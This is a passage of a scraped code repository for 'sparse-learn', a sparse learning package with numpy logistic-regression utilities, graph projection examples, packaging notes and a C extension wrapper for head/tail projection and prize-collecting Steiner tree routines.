utf-8 -*-\nimport numpy as np\n\n__all__ = ['expit', 'logistic_predict', 'node_pre_rec_fm',\n 'logit_loss_bl', 'node_pre_rec_fm', 'least_square_predict',\n 'logit_loss_grad_bl', 'logit_loss_grad', 'sensing_matrix']\n\n\ndef node_pre_rec_fm(true_feature, pred_feature):\n \"\"\"\n Return the precision, recall and f-measure.\n :param true_feature:\n :param pred_feature:\n :return: pre, rec and fm\n \"\"\"\n true_feature, pred_feature = set(true_feature), set(pred_feature)\n pre, rec, fm = 0.0, 0.0, 0.0\n if len(pred_feature) != 0:\n pre = len(true_feature & pred_feature) / float(len(pred_feature))\n if len(true_feature) != 0:\n rec = len(true_feature & pred_feature) / float(len(true_feature))\n if (pre + rec) > 0.:\n fm = (2. * pre * rec) / (pre + rec)\n return pre, rec, fm\n\n\ndef sensing_matrix(n, x, norm_noise=0.0):\n \"\"\" Generate a Gaussian matrix and corresponding n measurements.\n Please see equation 1.2 in [1]\n Reference:\n [1] Needell, Deanna, and Joel A. Tropp. \"CoSaMP: Iterative signal\n recovery from incomplete and inaccurate samples.\"\n Applied and computational harmonic analysis 26.3 (2009): 301-321.\n :param n: the number of measurements need to sensing.\n :param x: true signal.\n :param norm_noise: add noise by using: ||e|| = norm_noise.\n :return:\n x_mat: sensing matrix\n y_tr: measurement vector.\n y_e: measurement vector + ||e||\n \"\"\"\n p = len(x)\n x_mat = np.random.normal(0.0, 1.0, size=(n * p)) / np.sqrt(n)\n x_mat = x_mat.reshape((n, p))\n y_tr = np.dot(x_mat, x)\n noise_e = np.random.normal(0.0, 1.0, len(y_tr))\n y_e = y_tr + (norm_noise / np.linalg.norm(noise_e)) * noise_e\n return x_mat, y_tr, y_e\n\n\ndef expit(x):\n \"\"\"\n expit function. 1 /(1+exp(-x)). quote from Scipy:\n The expit function, also known as the logistic function,\n is defined as expit(x) = 1/(1+exp(-x)).\n It is the inverse of the logit function.\n expit is also known as logistic. Please see logistic\n :param x: np.ndarray\n :return: 1/(1+exp(-x)).\n \"\"\"\n out = np.zeros_like(x)\n posi = np.where(x > 0.0)\n nega = np.where(x <= 0.0)\n out[posi] = 1. / (1. + np.exp(-x[posi]))\n exp_x = np.exp(x[nega])\n out[nega] = exp_x / (1. + exp_x)\n return out\n\n\ndef logistic(x):\n \"\"\"\n logistic is also known as expit. Please see expit.\n :param x: np.ndarray\n :return:\n \"\"\"\n return expit(x)\n\n\ndef logistic_predict(x, wt):\n \"\"\"\n To predict the probability for sample xi. {+1,-1}\n :param x: (n,p) dimension, where p is the number of features.\n :param wt: (p+1,) dimension, where wt[p] is the intercept.\n :return: (n,1) dimension of predict probability of positive class\n and labels.\n \"\"\"\n n, p = x.shape\n pred_prob = expit(np.dot(x, wt[:p]) + wt[p])\n pred_y = np.ones(n)\n pred_y[pred_prob < 0.5] = -1.\n return pred_prob, pred_y\n\n\ndef least_square_predict(x_va, wt):\n \"\"\" To predict the probability for sample xi. \"\"\"\n pred_val, p = [], x_va.shape[1]\n for i in range(len(x_va)):\n pred_val.append(np.dot(wt[:p], x_va[i] + wt[p]))\n return np.asarray(pred_val)\n\n\ndef log_logistic(x):\n \"\"\" return log( 1/(1+exp(-x)) )\"\"\"\n out = np.zeros_like(x)\n posi = np.where(x > 0.0)\n nega = np.where(x <= 0.0)\n out[posi] = -np.log(1. + np.exp(-x[posi]))\n out[nega] = x[nega] - np.log(1. + np.exp(x[nega]))\n return out\n\n\ndef _grad_w(x_tr, y_tr, wt, eta):\n \"\"\" return {+1,-1} Logistic (val,grad) on training samples. 
\"\"\"\n assert len(wt) == (x_tr.shape[1] + 1)\n c, p = wt[-1], x_tr.shape[1]\n wt = wt[:p]\n yz = y_tr * (np.dot(x_tr, wt) + c)\n z = expit(yz)\n loss = -np.sum(log_logistic(yz)) + .5 * eta * np.dot(wt, wt)\n grad = np.zeros(p + 1)\n z0 = (z - 1) * y_tr\n grad[:p] = np.dot(x_tr.T, z0) + eta * wt\n grad[-1] = z0.sum()\n return loss, grad\n\n\ndef logit_loss_grad(x_tr, y_tr, wt, eta):\n \"\"\" return {+1,-1} Logistic (val,grad) on training samples. \"\"\"\n assert len(wt) == (x_tr.shape[1] + 1)\n c, n, p = wt[-1], x_tr.shape[0], x_tr.shape[1]\n wt = wt[:p]\n yz = y_tr * (np.dot(x_tr, wt) + c)\n z = expit(yz)\n loss = -np.sum(log_logistic(yz)) + .5 * eta * np.dot(wt, wt)\n grad = np.zeros(p + 1)\n z0 = (z - 1) * y_tr\n grad[:p] = np.dot(x_tr.T, z0) + eta * wt\n grad[-1] = z0.sum()\n return loss / float(n), grad / float(n)\n\n\ndef logit_loss_bl(x_tr, y_tr, wt, l2_reg, cp, cn):\n \"\"\"\n Calculate the balanced loss and gradient of the logistic function.\n :param x_tr: (n,p), where p is the number of features.\n :param y_tr: (n,), where n is the number of labels.\n :param wt: current model. wt[-1] is the intercept.\n :param l2_reg: regularization to avoid overfitting.\n :param cp:\n :param cn:\n :return:\n \"\"\"\n \"\"\" return {+1,-1} Logistic (val,grad) on training samples. \"\"\"\n assert len(wt) == (x_tr.shape[1] + 1)\n c, n, p = wt[-1], x_tr.shape[0], x_tr.shape[1]\n posi_idx = np.where(y_tr > 0) # corresponding to positive labels.\n nega_idx = np.where(y_tr < 0) # corresponding to negative labels.\n wt = wt[:p]\n yz = y_tr * (np.dot(x_tr, wt) + c)\n loss = -cp * np.sum(log_logistic(yz[posi_idx]))\n loss += -cn * np.sum(log_logistic(yz[nega_idx]))\n loss = loss / n + .5 * l2_reg * np.dot(wt, wt)\n return loss\n\n\ndef logit_loss_grad_bl(x_tr, y_tr, wt, l2_reg, cp, cn):\n \"\"\"\n Calculate the balanced loss and gradient of the logistic function.\n :param x_tr: (n,p), where p is the number of features.\n :param y_tr: (n,), where n is the number of labels.\n :param wt: current model. wt[-1] is the intercept.\n :param l2_reg: regularization to avoid overfitting.\n :param cp:\n :param cn:\n :return:\n \"\"\"\n \"\"\" return {+1,-1} Logistic (val,grad) on training samples. 
\"\"\"\n assert len(wt) == (x_tr.shape[1] + 1)\n c, n, p = wt[-1], x_tr.shape[0], x_tr.shape[1]\n posi_idx = np.where(y_tr > 0) # corresponding to positive labels.\n nega_idx = np.where(y_tr < 0) # corresponding to negative labels.\n grad = np.zeros_like(wt)\n wt = wt[:p]\n yz = y_tr * (np.dot(x_tr, wt) + c)\n z = expit(yz)\n loss = -cp * np.sum(log_logistic(yz[posi_idx]))\n loss += -cn * np.sum(log_logistic(yz[nega_idx]))\n loss = loss / n + .5 * l2_reg * np.dot(wt, wt)\n bl_y_tr = np.zeros_like(y_tr)\n bl_y_tr[posi_idx] = cp * np.asarray(y_tr[posi_idx], dtype=float)\n bl_y_tr[nega_idx] = cn * np.asarray(y_tr[nega_idx], dtype=float)\n z0 = (z - 1) * bl_y_tr # z0 = (z - 1) * y_tr\n grad[:p] = np.dot(x_tr.T, z0) / n + l2_reg * wt\n grad[-1] = z0.sum() # do not need to regularize the intercept.\n return loss, grad\n\n\ndef auc_node_fm(auc, node_fm):\n if 0.0 <= auc <= 1.0 and 0.0 <= node_fm <= 1.0:\n return 2.0 * (auc * node_fm) / (auc + node_fm)\n else:\n print('auc and node-fm must be in the range [0.0,1.0]')\n exit(0)\n\n\ndef m_print(result, method, trial_i, n_tr_, fig_i, mu, sub_graph,\n header=False):\n if header:\n print('-' * 165)\n print('method fig_i s tr_id '\n ' n_tr mu auc acc f1 ' +\n 'n_pre n_rec n_fm nega_in nega_out'\n ' posi_in posi_out intercept run_time')\n auc = result['auc'][-1]\n acc = result['acc'][-1]\n f1 = result['f1'][-1]\n node_pre = result['n_pre'][-1]\n node_rec = result['n_rec'][-1]\n node_fm = result['n_fm'][-1]\n num_nega_in = len([_ for ind, _ in enumerate(result['wt'][-1]) if\n ind in sub_graph and _ < 0.0])\n num_nega_out = len([_ for ind, _ in enumerate(result['wt'][-1]) if\n ind not in sub_graph and _ < 0.0])\n num_posi_in = len([_ for ind, _ in enumerate(result['wt'][-1]) if\n ind in sub_graph and _ > 0.0])\n num_posi_out = len([_ for ind, _ in enumerate(result['wt'][-1]) if\n ind not in sub_graph and _ > 0.0])\n sparsity = np.count_nonzero(result['wt'][-1][:1089])\n intercept = result['intercept'][-1]\n run_time = result['run_time'][-1]\n print('{:14s} {:6s} {:6s} {:6s} {:6s} {:7.1f} '\n '{:7.4f} {:7.4f} {:7.4f} {:7.4f} {:7.4f} {:7.4f} '\n '{:8d} {:8d} {:8d} {:8d} {:12.4f} {:12.3f}'\n .format(method, fig_i, str(sparsity), str(trial_i), str(n_tr_),\n mu, auc, acc, f1, node_pre, node_rec, node_fm, num_nega_in,\n num_nega_out, num_posi_in, num_posi_out, intercept,\n run_time))\n\n\ndef gen_test_case(x_tr, y_tr, w0, edges, weights):\n f = open('test_case.txt', 'wb')\n f.write(b'P %d %d %d\\n' % (len(x_tr), len(x_tr[0]), len(edges)))\n for i in range(len(x_tr)):\n f.write(b'x_tr ')\n for j in range(len(x_tr[i])):\n f.write(b'%.8f' % x_tr[i][j] + b' ')\n f.write(str(y_tr[i]) + '\\n')\n for i in range(len(edges)):\n f.write(b'E ' + str(edges[i][0]) + b' ' +\n str(edges[i][1]) + b' ' + '%.8f' % weights[i] + b'\\n')\n for i in range(len(w0)):\n f.write(b'N %d %.8f\\n' % (i, w0[i]))\n f.close()\n\n\ndef test_expit():\n print(expit(np.asarray([0.0])))\n print(expit(np.asarray([-1.0, 1.0])))\n print(expit(np.asarray([-10.0, 10.0])))\n print(expit(np.asarray([-1e5, 1e5])))\n\n\ndef test_logistic():\n x = np.asarray([[0.1, 0.2], [1., 1.], [0., 0.], [-1., -1.]])\n w = np.asarray([-0.1, 1.0, 0.0])\n print('predicted probability: '),\n print(logistic_predict(x, w)[0])\n print('predicted labels: '),\n print(logistic_predict(x, w)[1])\n\n\n" }, { "alpha_fraction": 0.6818181872367859, "alphanum_fraction": 0.6818181872367859, "avg_line_length": 21, "blob_id": "18788f4f3f29a64afe170acee70cdfb7fa55f99b", "content_id": "931715ff4d678a1da4392e00b9e2ac8eb62dc085", 
"detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22, "license_type": "permissive", "max_line_length": 21, "num_lines": 1, "path": "/__init__.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "name = \"sparse_learn\"\n" }, { "alpha_fraction": 0.5445544719696045, "alphanum_fraction": 0.584797203540802, "avg_line_length": 36.27381134033203, "blob_id": "7c2424561ab5801cad046d59d1ec9c9a46be94b8", "content_id": "e2d63a26936f2349bab22282d23596aeeb010c19", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3131, "license_type": "permissive", "max_line_length": 78, "num_lines": 84, "path": "/sparse_learn/examples/example_graph_proj.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport numpy as np\nfrom sparse_learn.proj_algo import head_proj\nfrom sparse_learn.proj_algo import tail_proj\nfrom sparse_learn.fast_pcst import fast_pcst\nfrom sparse_learn.graph_utils import simu_graph\n\n\ndef test_proj_head():\n print('-' * 100)\n edges, weights = simu_graph(25) # get grid graph\n sub_graph = [6, 7, 8, 9]\n x = np.random.normal(0.0, 0.1, 25)\n x[sub_graph] = 5.\n n, m = len(weights), edges.shape[1]\n re = head_proj(edges=edges, weights=weights, x=x, g=1, s=4, budget=3.,\n delta=1. / 169., err_tol=1e-6, max_iter=30, root=-1,\n pruning='strong', epsilon=1e-6, verbose=0)\n re_nodes, re_edges, p_x = re\n print('test1 result head nodes: ', re_nodes)\n print('test1 result head edges: ', re_edges)\n print(p_x)\n re = head_proj(edges=edges, weights=weights, x=np.zeros(n), g=1, s=4,\n budget=3., delta=1. / 169., err_tol=1e-6, max_iter=30,\n root=-1, pruning='strong', epsilon=1e-6, verbose=0)\n re_nodes, re_edges, p_x = re\n print('test2 result head nodes: ', re_nodes)\n print('test2 result head edges: ', re_edges)\n print(p_x)\n\n\ndef test_proj_tail():\n edges, weights = simu_graph(25) # get grid graph\n sub_graph = [6, 7, 8, 9]\n x = np.random.normal(0.0, 0.1, 25)\n x[sub_graph] = 5.\n n, m = len(weights), edges.shape[1]\n re = tail_proj(edges=edges, weights=weights, x=x, g=1, s=4, root=-1,\n max_iter=20, budget=3., nu=2.5)\n re_nodes, re_edges, p_x = re\n print('test3 result tail nodes: ', re_nodes)\n print('test3 result tail edges: ', re_nodes)\n print(p_x)\n re = tail_proj(edges=edges, weights=weights, x=np.zeros(n), g=1, s=4,\n root=-1, max_iter=20, budget=3., nu=2.5)\n re_nodes, re_edges, p_x = re\n print('test4 result tail nodes: ', re_nodes)\n print('test4 result tail edges: ', re_nodes)\n print(p_x)\n\n\ndef test_pcst():\n print('-' * 100)\n edges, weights = simu_graph(25) # get grid graph\n n, m = len(weights), edges.shape[1]\n x = np.random.normal(0.0, 0.1, 25)\n sub_graph = [6, 7, 8, 9]\n x[sub_graph] = 5.\n # edges, prizes, weights, root, g, pruning, epsilon, verbose\n re = fast_pcst(edges=edges, prizes=x ** 2., weights=weights, root=-1, g=1,\n pruning='gw', epsilon=1e-6, verbose=0)\n re_nodes, re_edges = re\n print('test7 result pcst nodes: ', re_nodes)\n print('test7 result pcst edges: ', re_nodes)\n re = fast_pcst(edges=edges, prizes=np.zeros(n), weights=weights, root=-1,\n g=1, pruning='gw', epsilon=1e-6, verbose=0)\n re_nodes, re_edges = re\n print('test8 result pcst nodes: ', re_nodes)\n print('test8 result pcst edges: ', re_nodes)\n re = fast_pcst(edges=edges, prizes=x ** 2., weights=weights, root=-1, g=1,\n pruning='strong', epsilon=1e-6, verbose=0)\n re_nodes, re_edges = re\n 
print('test9 result pcst nodes: ', re_nodes)\n print('test9 result pcst edges: ', re_nodes)\n\n\ndef main():\n test_proj_head()\n test_proj_tail()\n test_pcst()\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.6126042604446411, "alphanum_fraction": 0.6181649565696716, "avg_line_length": 32.16923141479492, "blob_id": "86a04b98965a2bbf9f58e220a79195e16cbba4cf", "content_id": "a0e3b54fd4155cfd6c74827344f0086bac8e13d8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 2158, "license_type": "permissive", "max_line_length": 73, "num_lines": 65, "path": "/doc/readme.txt", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "\nUpload module:\npython setup.py sdist bdist_wheel\n\n# sparse-learn\nThe sparse learning related methods.\n#------------------------------------------------\n#!/usr/bin/env bash\n# this file is for uploading.\nrm -rf dist\nrm -rf build\nrm -rf sparse_learning.egg-info\npython setup.py sdist bdist_wheel\ntwine upload dist/*.tar.gz\nrm -rf dist\nrm -rf build\nrm -rf sparse_learning.egg-info\n#------------------------------------------------\n\"\"\"\nHow to run it ? python setup.py build_ext --inplace\n\"\"\"\nimport os\nimport numpy\nfrom os import path\nfrom setuptools import setup\nfrom distutils.core import Extension\n\nhere = path.abspath(path.dirname(__file__))\n\nsrc_files = ['c/main_wrapper.c', 'c/head_tail_proj.c', 'c/fast_pcst.c']\ncompile_args = ['-std=c11', '-lpython2.7', '-lm']\n# calling the setup function\nsetup(\n # sparse_learning package.\n name='sparse_learning',\n # current version is 0.2.1\n version='0.2.4',\n # this is a wrapper of head and tail projection.\n description='A wrapper for sparse learning algorithms.',\n # a long description should be here.\n long_description='This package collects sparse learning algorithms.',\n # url of github projection.\n url='https://github.com/baojianzhou/sparse_learning.git',\n # number of authors.\n author='Baojian Zhou',\n # my email.\n author_email='bzhou6@albany.edu',\n include_dirs=[numpy.get_include()],\n license='MIT',\n packages=['sparse_learning'],\n classifiers=(\"Programming Language :: Python :: 2\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: POSIX :: Linux\",),\n # specify requirements of your package here\n install_requires=['numpy'],\n headers=['c/head_tail_proj.h', 'c/fast_pcst.h'],\n # define the extension module\n ext_modules=[Extension('proj_module',\n sources=src_files,\n language=\"C\",\n extra_compile_args=compile_args,\n include_dirs=[numpy.get_include()])],\n keywords='sparse learning, structure sparsity, head/tail projection')\n\nStep 1:\npip wheel /dir/to/proj-name/ -w /dir/where/wheels/are/written/\n\n" }, { "alpha_fraction": 0.549457848072052, "alphanum_fraction": 0.5618499517440796, "avg_line_length": 42.59485626220703, "blob_id": "40f7372ab98afccf2bae97a1c8bdc6c917127cdb", "content_id": "f9e008fe89335b27ad09257ec10c492ef6d1058f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 13557, "license_type": "permissive", "max_line_length": 85, "num_lines": 311, "path": "/sparse_learn/c/main_wrapper.c", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "#include <Python.h>\n#include <numpy/arrayobject.h>\n#include \"head_tail_proj.h\"\n\nstatic PyObject *test(PyObject *self, PyObject *args) {\n double sum = 0.0;\n PyArrayObject *x_tr_;\n if (!PyArg_ParseTuple(args, \"O!\", &PyArray_Type, 
&x_tr_)) { return NULL; }\n int n = (int) (x_tr_->dimensions[0]); // number of samples\n int p = (int) (x_tr_->dimensions[1]); // number of features\n printf(\"%d %d\\n\", n, p);\n double *x_tr = PyArray_DATA(x_tr_);\n for (int i = 0; i < n; i++) {\n for (int j = 0; j < p; j++) {\n printf(\"%.2f \", x_tr[i * p + j]);\n sum += x_tr[i * p + j];\n }\n printf(\"\\n\");\n }\n PyObject *results = PyFloat_FromDouble(sum);\n return results;\n}\n\nstatic PyObject *proj_head(PyObject *self, PyObject *args) {\n /**\n * DO NOT call this function directly, use the Python Wrapper instead.\n * list of args:\n * args[0]: ndarray dim=(m,2) -- edges of the graph.\n * args[1]: ndarray dim=(m,) -- weights (positive) of the graph.\n * args[2]: ndarray dim=(n,) -- the vector needs to be projected.\n * args[3]: integer np.int32 -- number of connected components returned.\n * args[4]: integer np.int32 -- sparsity (positive) parameter.\n * args[5]: double np.float64 -- budget of the graph model.\n * args[6]: double np.float64 -- delta. default is 1. / 169.\n * args[7]: integer np.int32 -- maximal # of iterations in the loop.\n * args[8]: double np.float64 -- error tolerance for minimum nonzero.\n * args[9]: integer np.int32 -- root(default is -1).\n * args[10]: string string -- pruning ['simple', 'gw', 'strong'].\n * args[11]: double np.float64-- epsilon to control the presion of PCST.\n * args[12]: integer np.int32 -- verbosity level\n * @return: (re_nodes, re_edges, p_x)\n * re_nodes: projected nodes\n * re_edges: projected edges (indices)\n * p_x: projection of x.\n */\n PyArrayObject *edges_, *weights_, *x_;\n int g, s, root, max_iter, verbose;\n double budget, delta, epsilon, err_tol;\n char *pruning;\n if (!PyArg_ParseTuple(\n args, \"O!O!O!iiddidizdi\", &PyArray_Type, &edges_, &PyArray_Type,\n &weights_, &PyArray_Type, &x_, &g, &s, &budget, &delta,\n &max_iter, &err_tol, &root, &pruning, &epsilon, &verbose)) {\n return NULL;\n }\n long n = x_->dimensions[0]; // number of nodes\n long m = edges_->dimensions[0]; // number of edges\n EdgePair *edges = malloc(sizeof(EdgePair) * m);\n double *prizes = malloc(sizeof(double) * n);\n double *costs = malloc(sizeof(double) * m);;\n double *x = (double *) PyArray_DATA(x_);\n PyObject *results = PyTuple_New(3);\n PyObject *p_x = PyList_New(n); // projected x\n for (int i = 0; i < m; i++) {\n edges[i].first = *(int *) PyArray_GETPTR2(edges_, i, 0);\n edges[i].second = *(int *) PyArray_GETPTR2(edges_, i, 1);\n double *wei = (double *) PyArray_GETPTR1(weights_, i);\n costs[i] = *wei + budget / s;\n }\n for (int i = 0; i < n; i++) {\n prizes[i] = (x[i]) * (x[i]);\n PyList_SetItem(p_x, i, PyFloat_FromDouble(0.0));\n }\n double C = 2. 
* budget;\n GraphStat *head_stat = make_graph_stat((int) n, (int) m);\n head_proj_exact(\n edges, costs, prizes, g, C, delta, max_iter,\n err_tol, root, GWPruning, epsilon, (int) n, (int) m,\n verbose, head_stat);\n PyObject *re_nodes = PyList_New(head_stat->re_nodes->size);\n PyObject *re_edges = PyList_New(head_stat->re_edges->size);\n for (int i = 0; i < head_stat->re_nodes->size; i++) {\n int node_i = head_stat->re_nodes->array[i];\n PyList_SetItem(re_nodes, i, PyLong_FromLong(node_i));\n PyList_SetItem(p_x, node_i, PyFloat_FromDouble(x[node_i]));\n }\n for (int i = 0; i < head_stat->re_edges->size; i++) {\n PyList_SetItem(re_edges, i,\n PyLong_FromLong(head_stat->re_edges->array[i]));\n }\n PyTuple_SetItem(results, 0, re_nodes);\n PyTuple_SetItem(results, 1, re_edges);\n PyTuple_SetItem(results, 2, p_x);\n free_graph_stat(head_stat);\n free(costs), free(prizes), free(edges);\n return results;\n}\n\nstatic PyObject *proj_tail(PyObject *self, PyObject *args) {\n /**\n * DO NOT call this function directly, use the Python Wrapper instead.\n * list of args:\n * args[0]: ndarray dim=(m,2) -- edges of the graph.\n * args[1]: ndarray dim=(m,) -- weights (positive) of the graph.\n * args[2]: ndarray dim=(n,) -- the vector needs to be projected.\n * args[3]: integer np.int32 -- number of connected components returned.\n * args[4]: integer np.int32 -- sparsity (positive) parameter.\n * args[5]: double np.float64 -- budget of the graph model.\n * args[6]: double np.float64 -- nu. default is 2.5\n * args[7]: integer np.int32 -- maximal # of iterations in the loop.\n * args[8]: double np.float32 -- error tolerance for minimum nonzero.\n * args[9]: integer np.int32 -- root(default is -1).\n * args[10]: string string -- pruning ['simple', 'gw', 'strong'].\n * args[11]: double np.float64-- epsilon to control the presion of PCST.\n * args[12]: integer np.int32 -- verbosity level\n * @return: (re_nodes, re_edges, p_x)\n * re_nodes: projected nodes\n * re_edges: projected edges (indices)\n * p_x: projection of x.\n */\n PyArrayObject *edges_, *weights_, *x_;\n int g, s, root, max_iter, verbose;\n double budget, nu, epsilon, err_tol;\n char *pruning;\n //edges, weights, x, g, s, budget, nu, max_iter, err_tol,\n // root, pruning, epsilon, verbose\n if (!PyArg_ParseTuple(\n args, \"O!O!O!iiddidizdi\", &PyArray_Type, &edges_, &PyArray_Type,\n &weights_, &PyArray_Type, &x_, &g, &s, &budget, &nu,\n &max_iter, &err_tol, &root, &pruning, &epsilon, &verbose)) {\n return NULL;\n }\n long n = x_->dimensions[0]; // number of nodes\n long m = edges_->dimensions[0]; // number of edges\n EdgePair *edges = malloc(sizeof(EdgePair) * m);\n double *prizes = malloc(sizeof(double) * n);\n double *costs = malloc(sizeof(double) * m);\n double *x = (double *) PyArray_DATA(x_);\n for (int i = 0; i < m; i++) {\n edges[i].first = *(int *) PyArray_GETPTR2(edges_, i, 0);\n edges[i].second = *(int *) PyArray_GETPTR2(edges_, i, 1);\n double *wei = (double *) PyArray_GETPTR1(weights_, i);\n costs[i] = (*wei + budget / s);\n }\n for (int i = 0; i < n; i++) {\n prizes[i] = (x[i]) * (x[i]);\n }\n double C = 2. 
* budget;\n PyObject *results = PyTuple_New(3);\n PyObject *p_x = PyList_New(n); // projected x\n for (int i = 0; i < n; i++) {\n prizes[i] = (x[i]) * (x[i]);\n PyList_SetItem(p_x, i, PyFloat_FromDouble(0.0));\n }\n GraphStat *tail_stat = make_graph_stat((int) n, (int) m);\n tail_proj_exact(\n edges, costs, prizes, g, C, nu, max_iter, err_tol, root, GWPruning,\n epsilon, (int) n, (int) m, verbose, tail_stat);\n PyObject *re_nodes = PyList_New(tail_stat->re_nodes->size);\n PyObject *re_edges = PyList_New(tail_stat->re_edges->size);\n for (int i = 0; i < tail_stat->re_nodes->size; i++) {\n int node_i = tail_stat->re_nodes->array[i];\n PyList_SetItem(re_nodes, i, PyLong_FromLong(node_i));\n PyList_SetItem(p_x, node_i, PyFloat_FromDouble(x[node_i]));\n }\n for (int i = 0; i < tail_stat->re_edges->size; i++) {\n PyList_SetItem(re_edges, i,\n PyLong_FromLong(tail_stat->re_edges->array[i]));\n }\n PyTuple_SetItem(results, 0, re_nodes);\n PyTuple_SetItem(results, 1, re_edges);\n PyTuple_SetItem(results, 2, p_x);\n free_graph_stat(tail_stat), free(costs), free(prizes), free(edges);\n return results;\n}\n\nstatic PyObject *proj_pcst(PyObject *self, PyObject *args) {\n /**\n * DO NOT call this function directly, use the Python Wrapper instead.\n * list of args:\n * args[0]: ndarray dim=(m,2) -- edges of the graph.\n * args[1]: ndarray dim=(n,) -- prizes of the graph.\n * args[2]: ndarray dim=(m,) -- costs on nodes.\n * args[3]: integer np.int32 -- root(default is -1).\n * args[4]: integer np.int32 -- number of connected components returned.\n * args[5]: string string -- pruning none, simple, gw, strong.\n * args[6]: double np.float32 -- epsilon to control the precision.\n * args[7]: integer np.int32 -- verbosity level\n * @return: (re_nodes, re_edges)\n * re_nodes: result nodes\n * re_edges: result edges\n */\n PyArrayObject *edges_, *prizes_, *weights_;\n int g, root, verbose;\n char *pruning;\n double epsilon;\n if (!PyArg_ParseTuple(args, \"O!O!O!iizdi\", &PyArray_Type, &edges_,\n &PyArray_Type, &prizes_, &PyArray_Type,\n &weights_, &root, &g, &pruning,\n &epsilon, &verbose)) { return NULL; }\n long n = prizes_->dimensions[0]; // number of nodes\n long m = edges_->dimensions[0]; // number of edges\n EdgePair *edges = malloc(sizeof(EdgePair) * m);\n double *prizes = (double *) PyArray_DATA(prizes_);\n double *costs = (double *) PyArray_DATA(weights_);\n for (int i = 0; i < m; i++) {\n edges[i].first = *(int *) PyArray_GETPTR2(edges_, i, 0);\n edges[i].second = *(int *) PyArray_GETPTR2(edges_, i, 1);\n }\n GraphStat *stat = make_graph_stat((int) n, (int) m);\n PCST *pcst = make_pcst(edges, prizes, costs, root,\n g, epsilon, GWPruning, (int) n, (int) m, verbose);\n run_pcst(pcst, stat->re_nodes, stat->re_edges), free_pcst(pcst);\n PyObject *results = PyTuple_New(2);\n PyObject *re_nodes = PyList_New(stat->re_nodes->size);\n PyObject *re_edges = PyList_New(stat->re_edges->size);\n for (int i = 0; i < stat->re_nodes->size; i++) {\n PyList_SetItem(re_nodes, i, PyLong_FromLong(stat->re_nodes->array[i]));\n }\n for (int i = 0; i < stat->re_edges->size; i++) {\n PyList_SetItem(re_edges, i, PyLong_FromLong(stat->re_edges->array[i]));\n }\n PyTuple_SetItem(results, 0, re_nodes);\n PyTuple_SetItem(results, 1, re_edges);\n free(edges), free(stat);\n return results;\n}\n\nstatic PyObject *head_tail_bi(PyObject *self, PyObject *args) {\n head_tail_bisearch_para *para = malloc(sizeof(head_tail_bisearch_para));\n PyArrayObject *edges_, *costs_, *prizes_;\n if (!PyArg_ParseTuple(args, \"O!O!O!iiiiii\",\n 
&PyArray_Type, &edges_,\n &PyArray_Type, &prizes_,\n &PyArray_Type, &costs_,\n &para->g,\n &para->root,\n &para->sparsity_low,\n &para->sparsity_high,\n &para->max_num_iter,\n &para->verbose)) { return NULL; }\n\n para->p = (int) prizes_->dimensions[0];\n para->m = (int) edges_->dimensions[0];\n para->prizes = (double *) PyArray_DATA(prizes_);\n para->costs = (double *) PyArray_DATA(costs_);\n para->edges = malloc(sizeof(EdgePair) * para->m);\n for (int i = 0; i < para->m; i++) {\n para->edges[i].first = *(int *) PyArray_GETPTR2(edges_, i, 0);\n para->edges[i].second = *(int *) PyArray_GETPTR2(edges_, i, 1);\n }\n GraphStat *graph_stat = make_graph_stat(para->p, para->m);\n head_tail_bisearch(\n para->edges, para->costs, para->prizes, para->p, para->m, para->g,\n para->root, para->sparsity_low, para->sparsity_high,\n para->max_num_iter, GWPruning, para->verbose, graph_stat);\n PyObject *results = PyTuple_New(1);\n PyObject *re_nodes = PyList_New(graph_stat->re_nodes->size);\n for (int i = 0; i < graph_stat->re_nodes->size; i++) {\n int cur_node = graph_stat->re_nodes->array[i];\n PyList_SetItem(re_nodes, i, PyLong_FromLong(cur_node));\n }\n PyTuple_SetItem(results, 0, re_nodes);\n free_graph_stat(graph_stat);\n free(para->edges);\n free(para);\n return results;\n}\n\n\nstatic PyMethodDef sparse_methods[] = {\n {\"c_test\", (PyCFunction) test, METH_VARARGS, \"docs\"},\n {\"c_proj_head\", (PyCFunction) proj_head, METH_VARARGS, \"docs\"},\n {\"c_proj_tail\", (PyCFunction) proj_tail, METH_VARARGS, \"docs\"},\n {\"c_proj_pcst\", (PyCFunction) proj_pcst, METH_VARARGS, \"docs\"},\n {\"c_head_tail_bi\", (PyCFunction) head_tail_bi, METH_VARARGS, \"docs\"},\n {NULL, NULL, 0, NULL}};\n\n#if PY_MAJOR_VERSION >= 3\nstatic struct PyModuleDef moduledef = {\n PyModuleDef_HEAD_INIT,\n \"sparse_learn\", /* m_name */\n \"This is a module\", /* m_doc */\n -1, /* m_size */\n sparse_methods, /* m_methods */\n NULL, /* m_reload */\n NULL, /* m_traverse */\n NULL, /* m_clear */\n NULL, /* m_free */\n };\n#endif\n\n/** Python version 2 for module initialization */\nPyMODINIT_FUNC\n#if PY_MAJOR_VERSION >= 3\nPyInit_sparse_learn(void){\n Py_Initialize();\n import_array(); // In order to use numpy, you must include this!\n return PyModule_Create(&moduledef);\n}\n#else\ninit_sparse_learn(void) {\n Py_InitModule3(\"sparse_learn\", sparse_methods, \"some docs for solam algorithm.\");\n import_array(); // In order to use numpy, you must include this!\n}\n\n#endif\n\nint main() {\n printf(\"test of main wrapper!\\n\");\n}" } ]
17
voidshard/pywysteria
https://github.com/voidshard/pywysteria
b4c4f1b2cafb7b1c0f6f83152dc036ef18e586ec
07c084f19376d7cc56fd539e5845e2d194f680c3
70998c48d2254968cc001350e807fdd4b91b868a
refs/heads/master
2021-01-20T07:23:58.409436
2019-08-04T12:01:09
2019-08-04T12:01:09
89,996,722
0
0
null
2017-05-02T05:57:54
2017-05-02T06:06:22
2017-10-08T10:04:06
Python
